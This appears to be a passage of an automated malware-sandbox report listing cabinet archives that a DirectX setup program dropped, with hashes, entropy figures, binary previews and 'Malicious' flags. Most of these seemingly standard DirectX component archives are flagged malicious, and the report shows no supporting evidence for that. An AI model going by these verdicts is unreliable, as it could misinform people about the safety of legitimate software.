                                                                                              File Type:Microsoft Cabinet archive data, many, 127143 bytes, 5 files, at 0x44 +A "xact2_1_x86.cat" +A "x3daudio1_0.dll", flags 0x4, ID 7334, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):136311
                                                                                              Entropy (8bit):7.992811243778454
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:NqvFmCDJEmTNSPtjVgIc5Ul8IlTq3UJWaL6LHZF/U7a7b0qJFkd22ig3nQ1d7+Z/:NYmCyC5U+Il0yWYSMaXzkYQ3nWUZDuY
                                                                                              MD5:A2132A62F9AB0BDDC3207166DC014581
                                                                                              SHA1:53B19AC3E6C6752011BA641EE3C409ED10C95DD9
                                                                                              SHA-256:52C71C89CCC22FED3D7C985A22C464451AF34B63B3A26A3799BC25D881221EBC
                                                                                              SHA-512:76FABD7F440B6F9B409B0B2635EAD4EF332563A9BED738A722A7C6B9A077094154BF735CAF02C67191B08AB0A19FC03E05EF3D984F6E34DCF3BD587A05D2F424
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 689905 bytes, 6 files, at 0x44 +A "d3dx10_33_x86.cat" +A "d3dcompiler_33.dll", flags 0x4, ID 9049, number 1, extra bytes 20 in head, 49 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):699073
                                                                                              Entropy (8bit):7.998968028413629
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:SHwziN1v34WzSc6IA6ajvY8ov8ZdReUTQ8Mr47JYCophIa9sNDn1QcILtw6:V01wWzCI3ajjls4NpAsNDnMw6
                                                                                              MD5:F784B8A0FD84C8AC3F218A9842D8DA56
                                                                                              SHA1:FB7B4B0F81CD5F1C6A900C71BFD4524AF9A79ECE
                                                                                              SHA-256:949068035CE57BBB3658217EC04F8DE7A122C6E7857B6F8B0CA002EB573DF553
                                                                                              SHA-512:01B818AA5188CDE3504E289AEDCA2D31A6C5AED479B18A2C78271828AE04BEBCD4082051B7F4EECA8A31E8EE5ADBA158420ECDCB21371C735E4781EE5F661DBF
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 131275 bytes, 5 files, at 0x44 +A "xact2_3_x86.cat" +A "x3daudio1_0.dll", flags 0x4, ID 7334, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):140443
                                                                                              Entropy (8bit):7.993872348182751
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:ZLkEev6VCdOQKPuF/p+emNC4J962LGMlPj6MoCW37gwND08:ZLkEeKCdsPufE59tLGMpxobsG08
                                                                                              MD5:E16F0875713956A6F9CD8C5ACAD36E51
                                                                                              SHA1:984B821EAEF3B549CE0B12F72A405A93E51A9DFE
                                                                                              SHA-256:31B16F93BE7F5F9BB78E9ECE6DA96565D50A0BC1F66B206B7A21C601A308DC53
                                                                                              SHA-512:DD626D5552EAF0C1DBD32BC4DD84811BACE74C6350EDDAC692D3C3E8C393F4A19C26E8F2932F54A14648448912E6B87C796C6EEB6DA9B2C55EC4565983B76189
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 40098 bytes, 4 files, at 0x44 +A "xinput1_2_x86.cat" +A "xinput1_2.dll", flags 0x4, ID 6335, number 1, extra bytes 20 in head, 3 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):49266
                                                                                              Entropy (8bit):7.9632460736333766
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:OuG396sAA1wXXvVFc2755DkphtVmUkt/lnkvH0odpl/q1nk:vwQsAhFcSmpJ3kt/xcd7ek
                                                                                              MD5:16B968CA0C435EE45E77A84C2D0364A9
                                                                                              SHA1:90B17A60A34F6335787A6B2D489CBCD3A4EA98C8
                                                                                              SHA-256:6DD7C0ABE37D3DF7AA6DB7BB352260F4A15DC965FF9D30AA32FE9595C1A18300
                                                                                              SHA-512:3BBBFDF8B5673641EC066C3FB52E6B0D5CE0BC6ED6BFF17AB4AC3FA69A8628B09E5EC8322FC39D2A206974B54D297CAAFF9410197E26D090FE74F963CD535045
                                                                                              Malicious:false
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 790907 bytes, 6 files, at 0x44 +A "d3dx10_35_x86.cat" +A "d3dcompiler_35.dll", flags 0x4, ID 9055, number 1, extra bytes 20 in head, 56 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):800075
                                                                                              Entropy (8bit):7.9986813742013325
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:iTo6mZ4UtaxS5hNsXjnUQEnnR62vSNE6xr8M6:iTdwtqAUXjU7nQaSNvxo
                                                                                              MD5:DDC4AF0D53B477E5AF77942E7118B66E
                                                                                              SHA1:81AD8201DCF653A6E977C4506A274D0BAC12643C
                                                                                              SHA-256:9536166EE7CC1100CFE24E01532E8E4DEED6BAA838B4C025581F2CA046A25915
                                                                                              SHA-512:1E082D7E7855BC0AF6EC09D4A69FD4A1B0A3A31E4DE8FAA52FA0BDCD601C501ADA6216DDDB83058F37AB4A371068E0F344BDF42F2551943BE19BD719D99BA93C
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 843207 bytes, 6 files, at 0x44 "d3dx10_39.dll" "D3DCompiler_39.dll", flags 0x4, ID 8952, number 1, extra bytes 20 in head, 61 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):852375
                                                                                              Entropy (8bit):7.998886184584254
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:E6Ih4DqlkwAjhr1mB+uYgrCvCZNmJ9ndKo4XYbX:E664DQkwAj/oNCvCZIdN4ID
                                                                                              MD5:5380053AC4C344BD38604022476B1C1D
                                                                                              SHA1:043DC8F49BCA3BF0BD85E858F5C2EEDF68565C0D
                                                                                              SHA-256:84800C55F773D5D6913E344E41BABA58CF07CEC2E6C7114CA3BF48E8F355419F
                                                                                              SHA-512:F3CE2DEF6E2E8A1D2C07F627E3C437A1BBA0B2E456020A84121346472BE3D28E0FC69623BD408F35A2C639C83DD2787F998DEDFE42B7625DC71500824B035FEC
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 3313780 bytes, 5 files, at 0x44 "d3dcsx_42.dll" "d3dcsx_42_x86.cat", flags 0x4, ID 7865, number 1, extra bytes 20 in head, 169 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):3322948
                                                                                              Entropy (8bit):7.9992960947448655
                                                                                              Encrypted:true
                                                                                              SSDEEP:98304:hd4ZyuDJf9oMm+hWh3ZHD8VZQCbsY/ny66RHX:BuD8b2WUZQCg+ny/
                                                                                              MD5:73BA11CE0E936726FC9FCB882F8B91EA
                                                                                              SHA1:4A4BABE3AC751E60AE6B5B0D69C93FA53D7FCD21
                                                                                              SHA-256:A9A704B73531D6BF59A421AB5C046C19A16D2B0B07F09816DBE9DA4550A24B17
                                                                                              SHA-512:9A198EB93D5623651D2981A277EAB4C345C08161254D0127D90C97344450AC1A7FD5C8AC840048A43A347E3296B286B646EA0FBA88F0C7BCE1CEED1484112D56
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 142023 bytes, 5 files, at 0x44 +A "xact2_6_x86.cat" +A "x3daudio1_1.dll", flags 0x4, ID 7329, number 1, extra bytes 20 in head, 9 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):151191
                                                                                              Entropy (8bit):7.993972565562067
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:4uMWvVgAanBDv9WkUtrr/uZfQMyolbnXkFDwoY0ZwuY:BVgAutNUtrLuZfjjljgTY0JY
                                                                                              MD5:A09F7EAB35816D682E7432DBB36B047D
                                                                                              SHA1:DB67B9434ABAA8E7F166956A1C8D01F536162C21
                                                                                              SHA-256:0E3655490667DDF17150AEC089889268BDD7F1E8367D2BED6F3EB68A5FF28288
                                                                                              SHA-512:FB1CDBFB3CDD60783D1C8696EA6EFB746331880C79AA74052808CA09092CF1A2336BF784104D16203740998129B718DC0AD4A632E4031E85CCF340C593F05E57
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1356836 bytes, 5 files, at 0x44 +A "d3dx9_29_x64.cat" +A "d3dx9_29.dll", flags 0x4, ID 6656, number 1, extra bytes 20 in head, 120 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1366004
                                                                                              Entropy (8bit):7.99967777757325
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:Qllh+6W44yAAf47xvIWTTbTpHe3Agqqvx3C86vBOZw1b4oWU+vz3zJvxfIc:Qh4DhlgWRHeQgtvx3FABOCth8vzN7
                                                                                              MD5:33618039DAC4E97C813E5BC1A499E6C6
                                                                                              SHA1:C792B9D0134DF698476C2FA4179DE6BCE8AA583B
                                                                                              SHA-256:A5FFAF9D58DA5D79402C4DC93E79960F971D2701D4651BB33D18925AF641F11D
                                                                                              SHA-512:35B490903721CA5FAEF73815D4F9C6F52EFAB1FE82A4FDBD7566A1B028525AFD29A72DC68D4B7D219CFA5CB33FEC241D6B2784F15F9795D368DC356B3DF30B5D
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 146949 bytes, 6 files, at 0x44 +A "xact2_8_x86.cat" +A "x3daudio1_2.dll", flags 0x4, ID 9016, number 1, extra bytes 20 in head, 10 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):156117
                                                                                              Entropy (8bit):7.994909703055095
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:tG7RXkNHRrOaYVD5yEThWmLksx2MeEm6oOD4+3y20OXtGhlYRTPZDT5P/lJXptA:eX8KVD5yETfLksAMUHo4+T5IhlYRDZDy
                                                                                              MD5:001CFF513A31EE082133E7BA3B0D71A2
                                                                                              SHA1:4517610A25239A16C26CA9890E1F0E52DDA3781A
                                                                                              SHA-256:245B0C554CBE2677939A70E5C4C6666B1B43D10D47980223F8CDEADB2D0EB76B
                                                                                              SHA-512:7119F6CA16FE6D968310F34828F30D8144531B89583CFD529056D2E31D5164FC65136FA9015B69849F724EC641A9291AC644C91CC3FA8EBDD4DAF9CF5A665A7F
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1058965 bytes, 5 files, at 0x44 +A "d3dx9_26_x86.cat" +A "d3dx9_26.dll", flags 0x4, ID 6937, number 1, extra bytes 20 in head, 71 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1068133
                                                                                              Entropy (8bit):7.999040217820951
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:NxFMsUF1MmwONoWu85w6SFBu+vveJ0sut3z2A1s9z/D8gigA:V3dm3NoW+9FBhuJ9ut36A1s9z78giP
                                                                                              MD5:029359EBCA4BA5945282E0C021B26102
                                                                                              SHA1:6107919F51E1B952CA600F832A6F86CBBED064B5
                                                                                              SHA-256:C44EABF5BE3B87CD845950670C27F6A1E5D92B7758BA7C39C7849B1EE1C649C0
                                                                                              SHA-512:FA007F257F5267119B247EC4ED368E51FD73E6AEA3097E2FC4E78078C063AF34D161FD1BDCAF3097BB575D2614DBA226A624D060009EE4F7BEDA697EFCF42BB7
                                                                                              Malicious:true
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 103485 bytes, 5 files, at 0x44 "d3dx11_43.dll" "d3dx11_43_x86.cat", flags 0x4, ID 7298, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):112653
                                                                                              Entropy (8bit):7.991810619702373
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:tXMVzDTlrM28bEHSqgik2ono4DQQ/7cuBFbb9aD4:tXMxNjG4gikye5FBtBr
                                                                                              MD5:061BBA3836B3FFCBB01B150467BBE951
                                                                                              SHA1:00D8FBCD4068B3199D3D393BB4B86BF82985480D
                                                                                              SHA-256:B80DB68CD82CAF8BEDAEE62808171B20C546A76499C3AD53014E3BD2FBD2918D
                                                                                              SHA-512:AEC8327E1CCC0B33B3E32D66A5EE25C4B70A227B708D10F61EBAD2D998F3BE68145FA85C50BAA16A21EE766B336B1432FBEC02C75D698793092015C832B6FC26
                                                                                              Malicious:true
                                                                                              Preview:MSCF....=.......D...........................=....#..................`..........<!]..d3dx11_43.dll.....`......<B'..d3dx11_43_x86.cat............<.&..d3dx11_43_x86.inf.(..........<.&..d3dx11_43_x86_xp.inf.c..........<.&..JUN2010_d3dx11_43_x86.inf.kK.*. ..CK.|.\.U........:(.....;.........\.".+...K......a....f*.eZVZf../M.2M1M35.bj..%~gf.,gv.........~>..<..{.y.93.{fv.c..(%EQ*d......?...?...z.i.^u=.g.b..>.%....*..*s...\Qa..'[.U5....c|Z...Zl.....m....\u....s....|.....2...s..*.rE^ Wn..J..j|.$...2....mO.ul.E.V..c.7R...E..+t...2p....@>.V`..<.).Rp..*_UrI{h.../Z..0|...sQJ*ACQ..J....*.F%..W.T..*....E.{P.....1..A..U.6...2.J..|^a|.....Zl....|.>.tT.P.x..=C.......V..b'^..*K....}.s...op.....?..'=...2T>.l).....l.2Od?E*.S.....V .GV.l<.Q. .Bv.]7......d...MB..,..72Od..WR...D.6.M.V!{...d%..B...@.L..j..:..(.=.G....b..BV.l...d....B........p%u....F.....l.!.G..l.2.,.. d...|..Qm.v....G..L...).C..c.#.Ih...................ee.......VPL....8X...H1.=A1...q....2.E!.l..M.E..jTw.z.y..*d....m...Y.
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 812300 bytes, 6 files, at 0x44 "d3dx10_37.dll" "D3DCompiler_37.dll", flags 0x4, ID 8943, number 1, extra bytes 20 in head, 58 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):821468
                                                                                              Entropy (8bit):7.9989494569533655
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:k8Yjgk28yEYvDLX3XmZcLHo9yLvTJqnrT+LprnNjjjGM6pdKi814DYnciABrI55V:1Yjp/yEcfLI9y4rORNYdKibxBrIS6
                                                                                              MD5:8234B9B90BCBB5077E1B5FAA0B66D1A9
                                                                                              SHA1:E9207C572FDEC592B7C17A7F9C6F875C8A55B1F0
                                                                                              SHA-256:6A2727269E6CAC7C4D2E316333D29BAC0DC1CD7F51C36C0C08B0388203DEDAD2
                                                                                              SHA-512:74C94A6E092D7C828FC1E3FAEE4B21917AFC3CACEC04F260754190D0533F93A58289763AC620E5A577F7865902023B30548CDA4D9E968C90EE13050AD6D1E8C5
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....e......D................"...........e...#..............:.............E8...d3dx10_37.dll...........e8....D3DCompiler_37.dll.f(..(.....e8K...d3dx10_37_x86.cat.I.........e8....d3dx10_37_x86.inf.i.........e8....d3dx10_37_x86_xp.inf.c...@.....e8....Mar2008_d3dx10_37_x86.inf...-..,..CK..\TU........[fz.,P..0}Q.a.L...T..`.f.;........i..io{n.*...ej.i.Yb........;w....r.....s...9.<g.%f.4.F.q...F.*"_zr.........6.4}..I.8.;o..9L..j.9.43..Z.....M`rl&..A.....n.b..Q.....;..).).MK{J...!...1..T'....:..&...,*O.k\.!}4.d.vH/5.0.....x-!.....{.c..@......Dm53SG.W..A..5..MK..P.?ZK64'd..%.4p......'..v.a-..3!...iYM...Jc.B.i..^.4.;.....b....:..i..'Ui{2.$m.t(w..w...Km..ZrM:..7g.p.w.m$..k..`..n..7JK.`...%..O..d..`....@2h.j.s.ZR.V....?..p-i.:../...@.X.&..:RK..y`"p.. ...a..\.@Y..l...<0.lB|6.d...Ac..N..=`.(..@.._.....)...`(....\..|....@.~i..-....z}.........]..'.........<0...d...A.h......e..@...6....,.....D0..A....A8...@K.a..6/.\.&t.$/.V.I.....f.".....t.$.....H..X.6....$
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1034785 bytes, 6 files, at 0x44 "d3dx10_41.dll" "D3DCompiler_41.dll", flags 0x4, ID 8914, number 1, extra bytes 20 in head, 71 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1043953
                                                                                              Entropy (8bit):7.998757160305283
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:JAEjuCeK6JgAkPBJoBgsqDP8FbGACV0L/sW0G+vv2:JFuCeVJqyxqDUFb9CV8r
                                                                                              MD5:45E83CBA5710A1DE7D3990A288122E85
                                                                                              SHA1:23C4BFBDDCFB11ACB7C47C409825F039AF7EB908
                                                                                              SHA-256:B7DA29103CDF374DE0C09713CB985035EAC45FB8B394D3B8157D8A7562A89899
                                                                                              SHA-512:8C56D376D349AA00948E1F3C6168DADE76AC9A26ADE1AAC5A385DCF0253602F5A2973483D083425195DB6AD7717494FD3CF674F5549774AC608CEFA2A88BF0A7
                                                                                              Malicious:true
                                                                                              Preview:MSCF....!.......D................"..........!....#..............G...P.........i:k{..d3dx10_41.dll.h-..P.....i:k{..D3DCompiler_41.dll.......#...p:.r..d3dx10_41_x86.cat.I...a4#...p:.r..d3dx10_41_x86.inf.i....7#...p:.r..d3dx10_41_x86_xp.inf.c....:#...p:.r..Mar2009_d3dx10_41_x86.inf.Nn.>.0..CK.wT.I..{.G.C.QQ.#(I.T`..Q.........0.b..5`Xs..bD.@..f1.9..x....Yw..{...s..U...[.kjj.....h3...TV2.nFx92?~=....m.l.[n.[..(81)]..R&..Sd...J.,F!Se..Re..A..e..~}..b.e[.fd.np.+..[......R;.z.....v....N.~...ibx.h.S.....W...7..-.a.8...`...$u..A.0K....j1..g..A.^k1...Pj.]bm.ym..~t...+d..`*..LG}..X...#.J.....;'e.Z.-.2..m.0....[W..#......j.05.Z.R.!..:.jd..e.........O..7:...\....k..bY...s4W).. ..%.......:g............p..Z...... ..<5.2..].... ..X.,..!~.0...v..k.c.1.2..V.10.L.#.R.x.=.S.9.....27.S@.....d.* .p.l.d......}.\...;.e./.0 ...&.~...8.\...:.L;.'....R..."`;p.....>...........BhW6.I&..D.!.3`...M...>u.....S.A......E@...0.P..@8....v.9....X@..."e....'..`c...(...^..R.'p...4....{ ...f...2....h
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 176401 bytes, 6 files, at 0x44 +A "xact2_4_x64.cat" +A "x3daudio1_1.dll", flags 0x4, ID 8466, number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):185569
                                                                                              Entropy (8bit):7.996440771278114
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:m3ZITAOIgaJqZazyaNuGKQb5aML7XTXM9+37VD5d58Oxz+oKG+ONa8bW9uMBowLB:iImMo2aHb0MvDn3jdhzWONFob
                                                                                              MD5:CC568D26B5B4CDA021D528CF75B21699
                                                                                              SHA1:DD47A33950C9E3A88DEFCAA7EA331FB1F1BBAB97
                                                                                              SHA-256:662D4E5D005CDBA02FABB0D7A68A7B48ECAFDEBE21718D892833D5C482E5ADD7
                                                                                              SHA-512:24B53BBD82DEC594D9909352D1F2AFE69B6F082DB99AAB3385826C4E8D22F5C075F3C5A24C8104DBEEF2D894980319AF141C65D768A51936C75092A846F3C8AA
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................!...............#..................! ........<5o. .xact2_4_x64.cat..E..! ....<5o. .x3daudio1_1.dll.....9e....<5.. .xactengine2_4.dll.....Q.....<5.. .infinst.exe.....i.....<5.. .oct2006_xact_x64.inf...........<5.. .xact2_4_x64.inf...~.x:..[.....0...R.P...O....5H"... .I.XA.D..MtT....A..MJ....$."=P).y.IB.EJ..".`4..f.{..n..Z.....|w..5@.!&. ..Gm..D..M.@.<[....9gea..8e..C.b_....... .....D".f.@......gP|..B...2......{.........'.3H..K.RU...B....{.......).....m.I@ ...Q]....(.'$..'...._4....J^.._......R)0i(b......_./.....80.@..H.H......?..%N.F.<.>...".gt.P..........'.....7R.@.....6.....P.V...X.od..$....Oy.......} "o.}...HWza..../.%..d..o.F..q...D+...)..."..C... .2.8..f....<..=N...c.Z4[v'.......f...i,.....P...s7...K'...:..A..bW.......S%v.##3...c..Q..+.$kQ..2.....,..=^../'.._!.D.......$.T.n..Z..'.@.2....O...:Y'...@...?./......"Ti2}...N..=.kq...x.T.?.Tq.?..?IB....N.x..=.CTl........V9y.sCay............D.Q.'.?.8..8.....<A......).$'..g
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 189806 bytes, 7 files, at 0x44 +A "xact2_7_x64.cat" +A "x3daudio1_1.dll", flags 0x4, ID 10116, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):198974
                                                                                              Entropy (8bit):7.996718266567073
                                                                                              Encrypted:true
                                                                                              SSDEEP:6144:kr+0amjUgjJG0HRzMUxWDJkUMP9KeK17dq569:krPVzjf+pk9keKdq5q
                                                                                              MD5:FBB6AA140D5D0AA28A7561EA15D69E72
                                                                                              SHA1:26804276EDBB1EE23B96690B40A01BB9C723F7DA
                                                                                              SHA-256:7781F0494648989583D4AC7695B9C5310EEA76B6A102E15EA0FC7376250E4584
                                                                                              SHA-512:08D6F2EF3346229F71E9FD6904D99BCB69F0A03CBD2D428F0A3BA58836694B801446165814AEE120B4C5EB7046184B08FB49248F5E1941579B9CAEAF9FBA1B1A
                                                                                              Malicious:true
                                                                                              Preview:MSCF....n.......D................'..........n....#..........*........).........6.. .xact2_7_x64.cat..E...)....e6Ge .x3daudio1_1.dll.h'...n.....6. .xactengine2_7.dll.h...B......6.. .infinst.exe............6D. .apr2007_xact_x64.inf.....B......6D. .xact2_7_x64.inf.%...E......6D. .xact2_7_x64_xp.inf.t%...8..[......[..1.P$.._.ww.U..UD*:WB...R..%D.J.?III].o7I. .o..7...._..1..3. ......@.......{.tz......-n.....n(..j..Z...m...[.dgi/wb.q...Cl..M.8.jmh|....h&"P`B ..%...c>..... .....D4...P..fo..D.....0.@...m...!...mT.......ir..q+)..r...*...o".D(.@A.)+.(..3..(.G.}.L ..p.....aF..,)..$.cr.1...J..%..|.)..=.K.H..Ep.....K..^...m6.......P....N@..I.|.|.'....@a.. "....H.d...1....&.!D......{.X-..\.S;0NOe.3,&......a.S~..;wd...R.Zt.7...J~..n.'.......J.e..'H.........@.~....T@..........y......8(2....9.p:...^...y...$....X*..b...c.N.Dprnd).$..d.mIv.,G.D.#..A..].1..A.L$].7`...;...L.....B!.....:..EA..1.V..?J.7..7...T.Bz....]..%t.7.F..5G:......."H..O9.....sAk.q.}1U.'I........o.t...jr.`v..
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 90857 bytes, 6 files, at 0x44 +A "xinput1_3_x64.cat" +A "xinput1_3.dll", flags 0x4, ID 9350, number 1, extra bytes 20 in head, 6 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):100025
                                                                                              Entropy (8bit):7.988437274786544
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:Mt5OSvuXSf2rbZu4Kmsr4eLRwPC5B9y7q:MTOBXSSpFI4/PM/ye
                                                                                              MD5:FAE84E0773A74F367124C6D871516B7B
                                                                                              SHA1:CAF8B9D7D4AF965BF445D052D1E835B680D6BBC3
                                                                                              SHA-256:86EE073C199B5080FE4F5BE6AC24BB1117FEA42E4BBCD828B4F0EC26C669B22C
                                                                                              SHA-512:CAF1381CAE7417B57FAEF56D0023BF90C90406748F8813AB85C687DDB81E2498D2F1D5F4BC154903FD5A19836E6F245CD6F5D3927A383F1ACC3BCC41B58FD09B
                                                                                              Malicious:false
                                                                                              Preview:MSCF.....b......D................$...........b...#...................(.........6+. .xinput1_3_x64.cat.h....(.....6. .xinput1_3.dll.h..........6.. .infinst.exe.\...h......6H. .apr2007_xinput_x64.inf............6G. .xinput1_3_x64.inf.....a......6H. .xinput1_3_x64_xp.inf...<.6..CK.\.\S.?....H3`@....B.....t.....D!.! " ].{..`AW........b.k/(....fNN ..z.}...g..of.7...|3#.]4.j...."V.;u.".,..t.....*.. o.!G4.G.<........!.I.P.'..t-B..T.N5...U.......2..S.....:....Ju.S.Q..v"D%..y.KR..B...a (.4.....7......x!L.\..u@.@...B.-G0......A..g...Dj8.j..L.X.."0."...^...kP.&@.}.....PP..k.p..|.`..P..D"... .H.1.h.^.G...#...+Ls..7..!qH."@..."..;,....Iz;u.t....>..Ki.y.~.5M`)SR(..$....&P:........-F...@....-..C.&V....N...Z..!....~.....{X"eo.5.D6.u...Y.9...8.......pg8....g....4....j@.S..T..C.H..7..ID...!.HP}.....7U..@?1".yMi....aA.....[..&.M.0A..'L,.q. 6`..DZ...i2.t..(Sw...e..X..6 ..y$...>....D.&R......>....~..U.Z...X.B.5:HAn.IU..[ .*.MH...8..Tgg'.H.G$H.$........)a...E b.y.>........t.....dF.
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 173173 bytes, 6 files, at 0x44 +A "xact2_1_x64.cat" +A "x3daudio1_0.dll", flags 0x4, ID 8453, number 1, extra bytes 20 in head, 14 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):182341
                                                                                              Entropy (8bit):7.996367169399176
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:iP7n/mIkqSEiqQAK23yLLBIvm2dozls4yaqS0yaP/Y5UZEPnQ79:iPL+fRqQAD3Tvxd8l/zsg5UZEIp
                                                                                              MD5:6CA70CDB3FA575506BA4035E9A50D8E4
                                                                                              SHA1:A2A20F5F95A1AB293A188A55BF593A82EA0DCB7F
                                                                                              SHA-256:F82B2043B470BF0E711C3D05D758A379920340212437917B5D98AF0C14E7BFE0
                                                                                              SHA-512:A453CED526332ACE37861A0A862FFF3710EF74ED57965F28DD279F526A2F33C390E82FD2C49BEE75476E5B4C349C40A71EEE49EDAC720236A16780DFD700FE62
                                                                                              Malicious:true
                                                                                              Preview:MSCF....u.......D................!..........u....#..................! .........46f .xact2_1_x64.cat..@..! ....C4)E .x3daudio1_0.dll..`...`.....4.e .xactengine2_1.dll............4.d .infinst.exe............4.e .apr2006_xact_x64.inf............4.e .xact2_1_x64.inf.....9..[......Z..A.P%..?.....DIx?...=HG..R.62^...T)....:.A.8..;.$.(..8.-......(..{.m...w.{.M...H.a....:.\^.S-R....c...u.k.^..q...5.bbK.0i.w.U).........C3..0.............."..3}...n..n..H. .((...B.l..#*hp..(>.."-a.|.[TuB..1.V....L..B....^Pi..`.b.....Sx*C...%.$.!....L..`.A..4.f.\.a..s......319..2..0QP..j.&.P\.B..z.~.P..P..$O...pI....o.T.F.../.d..g4...@EX...$I.2.....r.....B...A.....:.....HH5.....h... ...^.3.T...w...;...n...H......M...R.*..W .y.H....GD...Q..%..........DJ.6.#.."G.}@/|.....-A....W.....J..d..1....'P.......|b.$.z..yL..Jg...._r..W....P5.Q`...qyy.. ..s..p.<[.fr!.uv:..3.Y..9j.#or.A.<..T....7*}.F..d.:.]......>..:...Qs...a.C-...3}..r...#AU..O?=.2.T...e...e......p.S...4.....`....9|..~R.I....
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 40050 bytes, 4 files, at 0x44 +A "xinput1_1_x86.cat" +A "xinput1_1.dll", flags 0x4, ID 6338, number 1, extra bytes 20 in head, 3 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):49218
                                                                                              Entropy (8bit):7.962835058038329
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:rrXN+lWp5tvn2v0JeuXfYYJDyRIvwde6hecBLdKd+d4RUJ6HwyQs34VvD4:3gl6tfTVXwcWuqe6htcaJyQW4VvD4
                                                                                              MD5:E207FB904E641246F3F7234DB74121FC
                                                                                              SHA1:1BE8C50C074699BDD9184714E9022B7A2F8BF928
                                                                                              SHA-256:3FDF63211B0DD38069A9C1DF74D7BC42742DE003CEF72AD1486AAA92D74546FA
                                                                                              SHA-512:ED95D53BC351C98C0322753265B0A21C98DF97D0E2FBBC58A6836BFF374B7540B0CEA21371CD4A7EAD654210A42E1F9809CAC6E4EAE2ECF0EF2B88E220DC37F7
                                                                                              Malicious:false
